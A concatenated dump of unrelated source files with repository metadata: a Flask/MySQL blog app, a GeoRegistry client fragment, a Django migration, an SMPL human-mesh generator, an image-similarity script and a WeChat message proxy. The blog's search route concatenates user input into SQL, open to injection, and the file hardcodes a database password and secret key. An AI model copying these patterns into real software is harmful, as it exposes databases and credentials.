    except urllib2.HTTPError, error:
        raise GeoRegistryError(error.read())
    return response.read()

class Request(urllib2.Request):
    def __init__(self, method, *args, **kwargs):
        self._method = method
        urllib2.Request.__init__(self, *args, **kwargs)

    def get_method(self):
        return self._method

# Error
class GeoRegistryError(Exception):
    pass
|
[
"[email protected]"
] | |
b8a16ce325c65f9044f2ff1ecf5af27060e6b600
|
c719e07b1b4edb9596d8e286938bf29c9c8c3b4a
|
/blog.py
|
b59b2a7ec3369c2af7a07ec28a7f1443448e5ba5
|
[] |
no_license
|
furkanctn/FlaskBlogAPP
|
bbdcb37da4de8e8f14c3226b31c91502657d02f5
|
2fba43dcc5f18f378a9590f2f5223bfac1599ddc
|
refs/heads/main
| 2023-07-01T02:37:37.275304 | 2021-08-12T07:49:55 | 2021-08-12T07:49:55 | 395,234,915 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,453 |
py
|
from re import S
from MySQLdb import cursors
from flask import Flask, render_template,flash,redirect,url_for,session,logging,request
from flask_mysqldb import MySQL
from wtforms import Form,StringField,TextAreaField,PasswordField, form,validators
from passlib.hash import sha256_crypt
from functools import wraps
from wtforms.widgets.core import Select
# Login-required decorator
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if "logged_in" in session:
return f(*args,**kwargs)
else:
flash("Bu sayfayı görüntülemek için lütfen giriş yapın","danger")
return redirect(url_for("login"))
return decorated_function
# User registration form
class RegisterForm(Form):
name = StringField( "İsim Soyisim",validators = [validators.length(min=4,max=25)])
username = StringField( "Kullanıcı Adı",validators = [validators.length(min=4,max=25)])
email = StringField( "email adresi",validators = [validators.Email(message= "Lütfen geçerli bir Email adresi giriniz..")])
password = PasswordField("Parola",validators = [validators.DataRequired(message= "Lütfen bir paralo belirleyiniz."),validators.EqualTo(fieldname= "confirm",message= "Parolanız uyuşmuyor")])
confirm = PasswordField("Parola Doğrula")
class LoginForm(Form):
username = StringField("Kullanıcı Adı")
password = PasswordField("Parola")
app = Flask(__name__)
app.secret_key = "ybblog"
app.config["MYSQL_HOST"] = "localhost"
app.config["MYSQL_DB"] = "ybblog"
app.config["MYSQL_USER"] = "root"
app.config["MYSQL_PASSWORD"] = "Furkan1154."
app.config["MYSQL_CURSORCLASS"] = "DictCursor"
mysql = MySQL(app)
@app.route("/")
def index():
return render_template("index.html" )
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/articles")
def articles():
cursor = mysql.connection.cursor()
sorgu = "Select * From articles "
result = cursor.execute(sorgu)
if result > 0 :
articles = cursor.fetchall()
return render_template("articles.html",articles=articles)
else:
return render_template("articles.html")
@app.route("/dashboard")
@login_required
def dashboard():
cursor = mysql.connection.cursor()
sorgu = "Select * From articles where author = %s"
result = cursor.execute(sorgu,(session["username"],))
if result > 0:
articles = cursor.fetchall()
return render_template("dashboard.html",articles=articles)
else:
return render_template("dashboard.html")
# Registration
@app.route("/register",methods = ["GET","POST"])
def register():
form = RegisterForm(request.form)
if request.method == "POST" and form.validate():
name = form.name.data
username = form.username.data
email = form.email.data
password = sha256_crypt.encrypt(form.password.data)
cursor = mysql.connection.cursor()
sorgu = "INSERT INTO users (name,email,username,password) VALUES(%s,%s,%s,%s)"
cursor.execute(sorgu,(name,email,username,password))
mysql.connection.commit()
cursor.close()
flash("Başarıyla Kayıt Oldunuz ...","succes")
return redirect(url_for("login"))
else:
return render_template("register.html",form = form)
# Login
@app.route("/login",methods = ["GET","POST"])
def login():
form = LoginForm(request.form)
if request.method == "POST":
username = form.username.data
password_entered = form.password.data
cursor = mysql.connection.cursor()
sorgu = "Select * From users WHERE username = %s "
result = cursor.execute(sorgu,(username,))
mysql.connection.commit()
if result > 0:
data = cursor.fetchone()
real_password = data["password"]
if sha256_crypt.verify(password_entered,real_password):
flash("Başarıyla giriş yaptınız ","success")
session["logged_in"] = True
session["username"] = username
return redirect(url_for("index"))
else:
flash("Parolanızı yanlış girdiniz","danger")
return redirect(url_for("login"))
else:
flash("Böyle Bir kullanıcı bulunmuyor...","danger")
return redirect(url_for("login"))
return render_template ("login.html",form = form)
# Article detail page
@app.route("/article/<string:id>")
def article(id):
cursor = mysql.connection.cursor()
sorgu = "Select * from articles where id = %s "
result = cursor.execute(sorgu,(id,))
if result >0 :
article = cursor.fetchone()
return render_template("article.html",article = article )
else:
return render_template("article.html")
# Logout
@app.route("/logout")
def logout():
session.clear()
return redirect(url_for("index"))
@app.route("/addarticle",methods = ["GET","POST"])
def addarticle():
form = ArticleForm(request.form)
if request.method == "POST" and form.validate():
title = form.title.data
content = form.content.data
cursor = mysql.connection.cursor()
sorgu = "INSERT INTO articles (title,author,content) VALUES(%s,%s,%s)"
cursor.execute(sorgu,(title,session["username"],content))
mysql.connection.commit()
cursor.close()
flash("Makale Başarıyla eklendi..","success")
return redirect(url_for("dashboard"))
return render_template("addarticle.html",form=form)
# Article deletion
@app.route("/delete/<string:id>")
@login_required
def delete(id):
cursor = mysql.connection.cursor()
sorgu = "Select * from articles where author = %s and id = %s"
result = cursor.execute(sorgu,(session["username"],id))
if result >0 :
sorgu2 = "Delete from articles where id = %s "
cursor.execute(sorgu2,(id,))
mysql.connection.commit()
return redirect(url_for("dashboard"))
else:
flash("Böyle bir makale yok veya bu işlem için gerekli yetkiniz bulunmamaktadır.","danger")
return redirect(url_for("index"))
# Article update
@app.route("/edit/<string:id>",methods = ["GET", "POST"])
@login_required
def update(id):
if request.method == "GET":
cursor = mysql.connection.cursor()
sorgu = "Select * from articles where id = %s and author =%s "
result = cursor.execute(sorgu,(id,session["username"]))
if result == 0 :
flash("Böyle bir makale yok veya bu işlem için yetkiniz bulunmamaktadır","danger")
return redirect(url_for("index"))
else:
article = cursor.fetchone()
form = ArticleForm()
form.title.data = article["title"]
form.content.data = article["content"]
return render_template("update.html",form = form)
else:
form = ArticleForm(request.form)
newTitle = form.title.data
newContent = form.content.data
sorgu2 = "Update articles Set title = %s,content = %s where id = %s"
cursor = mysql.connection.cursor()
cursor.execute(sorgu2,(newTitle,newContent,id))
mysql.connection.commit()
flash("Makala başarıyla güncenllendi","success")
return redirect(url_for("dashboard"))
# Search URL
@app.route("/search",methods = ["GET","POST"])
def search():
if request.method =="GET":
return redirect(url_for("index"))
else:
keyword = request.form.get("keyword")
cursor = mysql.connection.cursor()
sorgu = "SELECT * FROM articles WHERE title LIKE '% "+ keyword + "%' "
result = cursor.execute(sorgu)
if result == 0 :
flash ("Aranan kelimeye uygun makale bulunamadı.","warninig")
return redirect(url_for("articles"))
else:
articles = cursor.fetchall()
return render_template("articles.html",articles = articles)
# Article form
class ArticleForm(Form):
title = StringField("Makale Başlığı",validators=[validators.length(min=3,max=100)])
content = TextAreaField("Makale İçeriği",validators=[validators.length(min=3,max=10000)])
if __name__ == "__main__":
app.run(debug=True)
|
[
"furkanc.tin63.gmail.com"
] |
furkanc.tin63.gmail.com
|
50f810b060440b87571481bdd02409e6fe2fea77
|
81ceba4abc00a43c6baa2057e278b9e35eae5d68
|
/EMS/migrations/0004_auto_20191026_1852.py
|
46b75f82193393ea213e977e977ef66ef5150e0b
|
[] |
no_license
|
deveshd2k/clgproject
|
188815d20af52bb183a1cbabaf39427d8d1769d8
|
94532f46164ac30232cda8d03121cda89a301d3d
|
refs/heads/master
| 2022-12-18T06:22:20.430223 | 2019-11-16T11:58:37 | 2019-11-16T11:58:37 | 219,149,052 | 0 | 2 | null | 2022-12-08T06:48:46 | 2019-11-02T12:13:46 |
JavaScript
|
UTF-8
|
Python
| false | false | 450 |
py
|
# Generated by Django 2.2.6 on 2019-10-26 13:22
import EMS.models
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('EMS', '0003_auto_20191026_1848'),
    ]

    operations = [
        migrations.AlterField(
            model_name='customuser',
            name='teacher_id',
            field=models.CharField(blank=True, default=EMS.models.teacherID, max_length=20),
        ),
    ]
|
[
"[email protected]"
] | |
22adc91bac04f3122bc3818650680df04a0b2166
|
87d6009910b00a0b377f819e415b8ee5badacad1
|
/data/generate_data_humans.py
|
f738e681720d3983b5a02028e496a52ccd3c57e9
|
[
"MIT"
] |
permissive
|
ThibaultGROUEIX/3D-CODED
|
a176d9017355a9013562a5f90fd4af79c2c918bd
|
7b28f2736edaaa1b2e6471d2acdc23e7e53de39c
|
refs/heads/master
| 2023-08-15T00:58:40.839499 | 2021-11-18T16:26:14 | 2021-11-18T16:26:14 | 137,830,527 | 328 | 54 | null | 2021-11-18T16:26:15 | 2018-06-19T02:31:35 |
Python
|
UTF-8
|
Python
| false | false | 8,642 |
py
|
import sys
sys.path.append('/home/thibault/lib/smpl')
import pymesh
import numpy as np
from smpl_webuser.serialization import load_model
mesh_ref = pymesh.load_mesh("./template/template_color.ply")
import cPickle as pickle
import os
def generate_surreal(pose, beta, outmesh_path):
"""
This function generates one human from a random SURREAL pose and shape
"""
## Assign gaussian pose
m.pose[:] = pose
m.betas[:] = beta
m.pose[0:3]=0
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0) #Useless because dataset has been normalised already
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def generate_gaussian(pose, beta, outmesh_path):
"""
This function generates one human from a random Gaussian pose and shape
"""
## Assign gaussian pose
m.betas[:] = beta
m.pose[0:3]=0
m.pose[3:]=0.3 * np.random.randn(69)
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0) #Useless because dataset has been normalised already
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def generate_benthuman(pose, beta, outmesh_path):
"""
This function generates one human with random Gaussian values on specific pose parameters, producing bent humans
"""
## Assign random pose parameters except for certain ones to have random bent humans
m.pose[:] = pose
m.betas[:] = beta
a = np.random.randn(12)
m.pose[1] = 0
m.pose[2] = 0
m.pose[3] = -1.0 + 0.1*a[0]
m.pose[4] = 0 + 0.1*a[1]
m.pose[5] = 0 + 0.1*a[2]
m.pose[6] = -1.0 + 0.1*a[0]
m.pose[7] = 0 + 0.1*a[3]
m.pose[8] = 0 + 0.1*a[4]
m.pose[9] = 0.9 + 0.1*a[6]
m.pose[0] = - (-0.8 + 0.1*a[0] )
m.pose[18] = 0.2 + 0.1*a[7]
m.pose[43] = 1.5 + 0.1*a[8]
m.pose[40] = -1.5 + 0.1*a[9]
m.pose[44] = -0.15
m.pose[41] = 0.15
m.pose[48:54] = 0
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0) #Useless because dataset has been normalised already
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def find_joint_influence(pose, beta, outmesh_path,i):
m.pose[:] = 0
m.betas[:] = beta
m.pose[i] = 1
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0)
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def generate_potential_templates(pose, beta, outmesh_path):
# template 0
m.pose[:] = 0
m.betas[:] = beta
m.pose[5] = 0.5
m.pose[8] = -0.5
m.pose[53] = -0.5
m.pose[50] = 0.5
point_set = m.r.astype(np.float32)
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh('search/template0.ply', mesh, "red", "green", "blue", ascii=True)
# template 1
m.pose[:] = 0
point_set = m.r.astype(np.float32)
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh('search/template1.ply', mesh, "red", "green", "blue", ascii=True)
return
def get_random(poses, betas):
beta_id = np.random.randint(np.shape(betas)[0]-1)
beta = betas[beta_id]
pose_id = np.random.randint(len(poses)-1)
pose_ = database[poses[pose_id]]
pose_id = np.random.randint(np.shape(pose_)[0])
pose = pose_[pose_id]
return pose, beta
def generate_database_surreal(male):
#TRAIN DATA
nb_generated_humans = 100000
nb_generated_humans_val = 100
if male:
betas = database['maleshapes']
offset = 0
offset_val = 0
else:
betas = database['femaleshapes']
offset = nb_generated_humans
offset_val = nb_generated_humans_val
poses = [i for i in database.keys() if "pose" in i]
print(len(poses))
num_poses= 0
for i in poses:
num_poses = num_poses + np.shape(database[i])[0]
print('Number of poses ' + str(num_poses))
print('Number of betas ' + str(np.shape(betas)[0]))
params = []
for i in range(nb_generated_humans):
pose, beta = get_random(poses, betas)
generate_surreal(pose, beta, 'dataset-surreal/' + str(offset + i) + '.ply')
#VAL DATA
for i in range(nb_generated_humans_val):
pose, beta = get_random(poses, betas)
generate_surreal(pose, beta, 'dataset-surreal-val/' + str(offset_val + i) + '.ply')
return 0
def generate_database_benthumans(male):
#TRAIN DATA
nb_generated_humans = 15000
nb_generated_humans_val = 100
if male:
betas = database['maleshapes']
offset = 0
offset_val = 0
else:
betas = database['femaleshapes']
offset = nb_generated_humans
offset_val = nb_generated_humans_val
poses = [i for i in database.keys() if "pose" in i]
print(len(poses))
num_poses= 0
for i in poses:
num_poses = num_poses + np.shape(database[i])[0]
print('Number of poses ' + str(num_poses))
print('Number of betas ' + str(np.shape(betas)[0]))
params = []
for i in range(nb_generated_humans):
pose, beta = get_random(poses, betas)
generate_benthuman(pose, beta, 'dataset-bent/' + str(offset + i) + '.ply')
#VAL DATA
for i in range(nb_generated_humans_val):
pose, beta = get_random(poses, betas)
generate_benthuman(pose, beta, 'dataset-bent-val/' + str(offset_val + i) + '.ply')
return 0
if __name__ == '__main__':
os.mkdir("dataset-surreal")
os.mkdir("dataset-surreal-val")
os.mkdir("dataset-bent")
os.mkdir("dataset-bent-val")
### GENERATE MALE EXAMPLES
m = load_model("./smpl_data/basicmodel_m_lbs_10_207_0_v1.0.0.pkl")
database = np.load("/home/thibault/tmp/SURREAL/smpl_data/smpl_data.npz")
generate_database_surreal(male=True)
generate_database_benthumans(male=True)
### GENERATE FEMALE EXAMPLES
m = load_model('./smpl_data/basicModel_f_lbs_10_207_0_v1.0.0.pkl')
database = np.load("./smpl_data/smpl_data.npz")
generate_database_surreal(male=False)
generate_database_benthumans(male=False)
|
[
"[email protected]"
] | |
8071db56a1faa459eccd4c3bfbd0c735f51f2c1e
|
6ace7e15e3191d1b8228ad7922a8552ca84f84e7
|
/.history/image_detector_20200614203341.py
|
2465a36001cd934f7bd739e37f170e75e719b85c
|
[] |
no_license
|
mehmetaliarican/Similar-Image-Finder
|
f72e95be50c51aa03fc64954a03124b199ca64b1
|
a9e0015c443b4a73394099cccf60329cfc4c7cef
|
refs/heads/master
| 2022-10-27T00:57:43.173993 | 2020-06-14T18:02:16 | 2020-06-14T18:02:16 | 272,256,295 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,485 |
py
|
from skimage.metrics import structural_similarity as ssim
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import cv2
import glob
import os
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--threshold", type=float, default=0.9,
help="threshold")
ap.add_argument("-d", "--dataset", required=True,
help="path to input dataset")
args = vars(ap.parse_args())
class Utility:
totalFound = 0
totalSearch = 0
searching = False
def mse(self, imageA, imageB):
# the 'Mean Squared Error' between the two images is the
# sum of the squared difference between the two images;
# NOTE: the two images must have the same dimension
err = np.sum((imageA.astype("float") - imageB.astype("float")) ** 2)
err /= float(imageA.shape[0] * imageA.shape[1])
# return the MSE, the lower the error, the more "similar"
# the two images are
return err
def compare_images(self, im1, im2, imageA, imageB):
# compute the mean squared error and structural similarity
# index for the images
m = self.mse(imageA, imageB)
s = ssim(imageA, imageB)
tres = args['threshold']
self.totalSearch += 1
if s >= tres:
print("Image[{c1}] '{p1}' compared to Image[{c2}] '{p2}' Simility:{sim}".format(c1=im1['comp'], c2=im2['comp'],p1=im1['path'], p2=im2['path'], sim=str(s)))
twin = np.hstack([imageA, imageB])
cv2.imshow('', twin)
cv2.waitKey(0)
self.searching = False
elif self.searching is False:
print('Searching...')
self.searching = True
imagePaths = list(paths.list_images(args['dataset']))
companies = ['dhl', 'paypal', 'wellsfargo']
all_data = []
for path in imagePaths:
company = ''
for c in companies:
if c in path:
company = c
all_data.append({'comp': c, 'path': path})
print(all_data)
u = Utility()
for image in all_data:
try:
p1 = cv2.imread(image['path'])
p1 = cv2.resize(p1, (300, 300))
p1 = cv2.cvtColor(p1, cv2.COLOR_BGR2GRAY)
for i in all_data:
if i['path'] != image['path']:
p2 = cv2.imread(i['path'])
p2 = cv2.resize(p2, (300, 300))
p2 = cv2.cvtColor(p2, cv2.COLOR_BGR2GRAY)
u.compare_images(image, i, p1, p2)
except Exception as e:
print(str(e))
|
[
"[email protected]"
] | |
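To make the "Mean Squared Error" comment in mse() above concrete, a standalone worked example (the two 2x2 arrays are illustrative):

import numpy as np

a = np.zeros((2, 2), dtype="uint8")
b = a.copy()
b[0, 0] = 10  # one pixel differs by 10
err = np.sum((a.astype("float") - b.astype("float")) ** 2) / float(a.shape[0] * a.shape[1])
print(err)  # 10**2 / 4 = 25.0 -> lower means more similar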
be8e2c8714c19d0c40a4c4d30f0f27ad4db621a7
|
4221d0686153b599b7cf9edcd806a73253340887
|
/IMMonitor/wx/message/proxy.py
|
aa17d508c55cb9601a28d45fa962b7348d02da24
|
[] |
no_license
|
taozi926494/IMMonitor
|
4e7e8a140003e817a85b553d27e27ae19e15527c
|
92b71c006cb30d88023a0c0510e31fd2b4e9a4ef
|
refs/heads/master
| 2020-04-26T15:35:59.048928 | 2019-03-11T04:29:07 | 2019-03-11T04:29:07 | 173,651,747 | 0 | 7 | null | 2019-03-12T03:02:49 | 2019-03-04T01:21:02 |
Python
|
UTF-8
|
Python
| false | false | 12,402 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : proxy.py
# @Time : 2018-12-12 10:23
# @Software: PyCharm
# @Author : Taoz
# @contact : [email protected]
# Proxies for WeChat message-related requests
import base64
import io
import json
import random
import re
import time
import xml
import requests
from flask import session
from pyqrcode import QRCode
from IMMonitor.wx import s, config, getBaseRequest
from IMMonitor.wx.utils import *
from IMMonitor import SESSION_KEY, ret_val
from IMMonitor.wx.model import *
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
def sync_check():
"""
Proxy that checks whether there are new messages
:return:
"""
'''
-----------------------------------------------------------------------------------------------------
| Endpoint       | https://webpush2.weixin.qq.com/cgi-bin/mmwebwx-bin/synccheck
-----------------------------------------------------------------------------------------------------
| Method         | GET
-----------------------------------------------------------------------------------------------------
|                | r=timestamp (ms)
|                | skey=xxx
|                | sid=xxx
| Parameters     | uin=xxx
|                | deviceid=xxx
|                | synckey=1_654585659%7C2_654585745%7C3_654585673%7C1000_1467162721_=1467184052133
-----------------------------------------------------------------------------------------------------
| Returns        | {window.synccheck={retcode:"xxx",selector:"xxx"}
-----------------------------------------------------------------------------------------------------
|                | retcode:
|                |     0      OK
|                |     1100   failure / logged out of WeChat
| Return fields  | selector:
|                |     0      OK, no new message
|                |     2      new message
|                |     4      new Moments activity
|                |     6      a message result was returned
|                |     7      entered/left a chat window
-----------------------------------------------------------------------------------------------------
The core of web WeChat is a polling + fetching loop: the polling endpoint is synccheck and the
message-fetching endpoint is webwxsync.
First send a GET request to synccheck; if there is no new message for the moment, the connection
is held open without returning until it times out.
After the timeout the server returns a packet like: {window.synccheck={retcode:"xxx",selector:"xxx"}
RETCODE is the status; non-zero means an error.
SELECTOR indicates messages: 0 means none, non-zero means there are messages.
So in the timeout case, selector is 0.
If a new message arrives after the GET request, the server immediately returns a packet in the
same format, with RETCODE 0 and a non-zero SELECTOR.
At that point, call the webwxsync endpoint with POST to fetch the new messages.
Besides the messages, the POST response header also carries Set-Cookie directives (though the
cookie seems identical each time and stays valid for as long as a day), and the response body
contains something important: syncKey and syncCheckKey.
This is one of the outdated points mentioned earlier: most material online mentions only a single
syncKey, while the actual response contains both a syncKey and a syncCheckKey.
As the names suggest, the former is used for the synccheck endpoint and the latter for the
webwxsync endpoint.
Since syncKey is refreshed on every call, if one webwxsync response goes wrong the rest of the
program cannot continue (the local key has already expired).
References:
1. https://blog.csdn.net/wonxxx/article/details/51787041
2. https://www.cnblogs.com/shawnye/p/6376400.html
'''
loginInfo = session.get('WxLoginInfo')
# Assemble the request url and parameters
url = '%s/synccheck' % loginInfo.get('syncUrl', loginInfo['url'])
params = {
'r': int(time.time() * 1000),
'skey': loginInfo['skey'],
'sid': loginInfo['sid'],
'uin': loginInfo['uin'],
'deviceid': loginInfo['deviceid'],
'synckey': loginInfo['synckey'],
'_': loginInfo['logintime'], }
headers = {'User-Agent': config.USER_AGENT}
loginInfo['logintime'] += 1
# Keep the logintime in the session in sync
session[SESSION_KEY.WxLoginInfo]['logintime'] = loginInfo['logintime']
try:
r = s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# seems like status of typing, but before I make further achievement code will remain like this
return '2'
except:
raise
# If the connection returned 404 or another error, raise via raise_for_status
r.raise_for_status()
# Extract the returned fields
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
# Filter the message status:
# if the retcode field in the response == 0, return the selector value;
# anything else is treated as an error and returns None
if pm is None or pm.group(1) != '0':
return ret_val.gen(ret_val.CODE_PROXY_ERR,
extra_msg='Weixin proxy sync_check get wrong response '
'微信sync_check检查消息接口返回值不正确,失败或退出微信')
return ret_val.gen(ret_val.CODE_SUCCESS, data={
"message_status": pm.group(2)
})
def get_msg():
"""
Proxy that pulls new messages
:return: tuple (dic['AddMsgList'], dic['ModContactList'])
AddMsgList: list of all new messages
ModContactList: list of all contacts that changed
"""
loginInfo = session.get(SESSION_KEY.WxLoginInfo)
# Assemble the url and parameters for pulling new messages
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
loginInfo['url'], loginInfo['sid'],
loginInfo['skey'], loginInfo['passticket'])
data = {
'BaseRequest': getBaseRequest(),
'SyncKey': loginInfo['synckeydict'],
'rr': ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent': config.USER_AGENT}
# Send the request that pulls new messages
r = s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
response = json.loads(r.content.decode('utf-8', 'replace'))
if response['BaseResponse']['Ret'] != 0:
return ret_val.gen(ret_val.CODE_PROXY_ERR,
extra_msg='Error get msg ! 拉取新消息出错 !')
# Update synckeydict and synckey in the session login info
session[SESSION_KEY.WxLoginInfo]['synckeydict'] = response['SyncKey']
session[SESSION_KEY.WxLoginInfo]['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in response['SyncCheckKey']['List']])
return ret_val.gen(ret_val.CODE_SUCCESS, data={
'AddMsgList': response['AddMsgList'],
'ModContactList': response['ModContactList']
})
def produce_group_chat(msg, loginInfo):
"""
Purpose: process a group chat message, attaching group and sender information
:param msg: the message to process
:param loginInfo: info of the currently logged-in user
:return: None, because the source data is modified in place
"""
"""
Format of a message sent by someone else:
msg['Content'] = @0b4c38ff87f1d8f06556f62e1266ed67be471b761396aac2a9e967cd7c2858a7:<br/>打工的怪不得
Format of a message sent by yourself:
msg['Content'] = 打工的怪不得
"""
# 正则表达式,匹配第一个@后的0-9或者a-z字符,以及<br/>后的除换行后的任意字符
r = re.match('(@[0-9a-z]*?):<br/>(.*)$', msg['Content'])
'''
The next 3 branches extract
actualUserName: username of the message sender
chatroomUserName: username of the group
'''
# The regex matches when the message was sent by someone else
if r:
# Get the actual username and the content
actualUserName, content = r.groups()
# Username of the chat group; this username is the encoded form
chatroomUserName = msg['FromUserName']
# If the message was sent by the logged-in user
elif msg['FromUserName'] == loginInfo['username']:
# The actual username equals the user's own username
actualUserName = loginInfo['username']
# Message content
content = msg['Content']
# The group username equals the receiver username in msg
chatroomUserName = msg['ToUserName']
# This case is unclear; it roughly serves to debug WeChat emoji handling
else:
# Actual username
msg['ActualUserName'] = loginInfo['username']
# Nickname for the message
msg['ActualNickName'] = loginInfo['username']
# Whether there is an @ mention
msg['IsAt'] = False
# Work around emoji bugs caused by the WeChat backend, e.g. "face with tears of joy" being replaced by "cat face with tears of joy"
msg_formatter(msg, 'Content')
return
# Look up the chatroom that the current message came from
group = WxGroup.find_one(user_name=chatroomUserName)
# TODO handle messages that do not come from a monitored group
if not group:
return None
else:
# Group names
msg['GroupUserName'] = group.UserName
msg['GroupNickName'] = group.NickName
# Find the member who sent the message
member = WxGroupMember.find_one(group_username=chatroomUserName, member_username=actualUserName)
# TODO handle the case where this member is not found
if not member:
return None
# If the sending member's info is found after the update
else:
# Actual nickname == the member's remark name or group nickname; show the remark if present, otherwise the group nickname; DisplayName is the name shown in the group
msg['ActualNickName'] = member.NickName
msg['ActualDisplayName'] = member.DisplayName
# Build the @ flag, formatted as '@' + the logged-in user's display name in the group
# TODO handle messages that @-mention me
# for memb in chatroom['MemberList']:
# if memb['UserName'] == loginInfo['User']['UserName']:
# break
# atFlag = '@' + (memb.get('DisplayName', '') or loginInfo['User']['NickName'])
# """
# (atFlag + (u'\u2005' if u'\u2005' in msg['Content'] else ' ')
# means:
# atFlag + a space (the Unicode space if the content contains one, otherwise an ASCII space), call it temp
# If the content contains the temp string or ends with it, msg['IsAt'] = True, otherwise False
# msg['IsAt'] is True when you @-mention yourself, otherwise False
# """
# msg['IsAt'] = (
# (atFlag + (u'\u2005' if u'\u2005' in msg['Content'] else ' '))
# in msg['Content'] or msg['Content'].endswith(atFlag))
# Actual username of the message
msg['ActualUserName'] = actualUserName
# Message content
msg['Content'] = content
# Format the message to work around some web WeChat bugs
msg_formatter(msg, 'Content')
def send_raw_msg(msgType, content, toUserName):
loginInfo = session.get(SESSION_KEY.WxLoginInfo)
url = '%s/webwxsendmsg' % loginInfo['url']
data = {
'BaseRequest': getBaseRequest(),
'Msg': {
'Type': msgType,
'Content': content,
'FromUserName': loginInfo['username'],
'ToUserName': toUserName,
'LocalID': int(time.time() * 1e4),
'ClientMsgId': int(time.time() * 1e4),
},
'Scene': 0, }
headers = {'ContentType': 'application/json; charset=UTF-8', 'User-Agent': config.USER_AGENT}
r = s.post(url, headers=headers,
data=json.dumps(data, ensure_ascii=False).encode('utf8'))
response = json.loads(r.content.decode('utf-8', 'replace'))
if response['BaseResponse']['Ret'] != 0:
return ret_val.gen(ret_val.CODE_PROXY_ERR,
extra_msg='Error get msg ! 消息发送失败 !')
else:
return ret_val.gen(ret_val.CODE_SUCCESS)
|
[
"[email protected]"
] | |
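The synccheck/webwxsync protocol described in the sync_check docstring above reduces to a poll-and-fetch loop; a sketch under stated assumptions: only sync_check and get_msg come from the module above, a populated login session is required, and the {'code': ..., 'data': ...} layout of ret_val.gen results plus the handle_messages callback are hypothetical:

import time

def message_loop(handle_messages):
    while True:
        check = sync_check()                    # long-polls the synccheck endpoint
        if check["code"] != 0:                  # assumed ret_val layout (hypothetical)
            break                               # retcode error: failure or logged out
        if check["data"]["message_status"] != "0":
            result = get_msg()                  # POST to webwxsync; refreshes the sync keys
            if result["code"] == 0:
                handle_messages(result["data"]["AddMsgList"])
        time.sleep(1)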
a3d0222fa8f4486519ffbbbe5c77ae4db0b06a79
|
ee6a6489bfc55cabebe8d975a8747a5334ca2ea2
|
/osc_liblo_server_simple_example.py
|
53f2372b70903c4842b5df87160b91c54c581480
|
[] |
no_license
|
